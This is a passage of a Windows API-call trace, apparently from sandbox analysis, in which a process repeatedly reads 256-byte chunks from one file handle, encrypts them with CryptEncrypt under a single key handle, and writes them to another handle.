pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.033] GetLastError () returned 0x0 [0164.033] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.033] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.033] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.033] GetLastError () returned 0x0 [0164.033] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.033] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.033] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.033] GetLastError () returned 0x0 [0164.033] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.034] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.034] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.034] GetLastError () returned 0x0 [0164.034] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.034] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.034] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.034] GetLastError () returned 0x0 [0164.034] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.034] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.034] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.034] GetLastError () returned 0x0 [0164.034] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.034] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.034] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.034] GetLastError () returned 0x0 [0164.034] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.034] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.034] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.034] GetLastError () returned 0x0 [0164.034] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.034] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.035] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.035] GetLastError () returned 0x0 [0164.035] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.035] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.035] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.035] GetLastError () returned 0x0 [0164.035] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.035] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.035] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.035] GetLastError () returned 0x0 [0164.035] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.035] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.035] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.035] GetLastError () returned 0x0 [0164.035] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.035] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.035] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.035] GetLastError () returned 0x0 [0164.035] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.035] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.035] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.035] GetLastError () returned 0x0 [0164.035] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.035] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.036] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.036] GetLastError () returned 0x0 [0164.036] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.036] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.036] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.036] GetLastError () returned 0x0 [0164.036] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.036] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.036] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.036] GetLastError () returned 0x0 [0164.036] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.036] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.036] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.036] GetLastError () returned 0x0 [0164.036] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.036] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.036] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.036] GetLastError () returned 0x0 [0164.036] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.036] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.036] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.036] GetLastError () returned 0x0 [0164.036] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.036] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.036] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.036] GetLastError () returned 0x0 [0164.037] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.037] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.037] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.037] GetLastError () returned 0x0 [0164.037] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.037] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.037] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.037] GetLastError () returned 0x0 [0164.037] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.037] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.037] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.037] GetLastError () returned 0x0 [0164.037] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.037] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.037] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.037] GetLastError () returned 0x0 [0164.037] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.037] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.037] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.038] GetLastError () returned 0x0 [0164.038] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.038] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.038] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.038] GetLastError () returned 0x0 [0164.038] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.038] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.038] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.038] GetLastError () returned 0x0 [0164.038] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.038] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.038] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.038] GetLastError () returned 0x0 [0164.038] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.038] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.038] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.038] GetLastError () returned 0x0 [0164.038] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.039] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.039] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.039] GetLastError () returned 0x0 [0164.039] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.039] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.039] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.039] GetLastError () returned 0x0 [0164.039] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.039] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.039] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.039] GetLastError () returned 0x0 [0164.039] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, 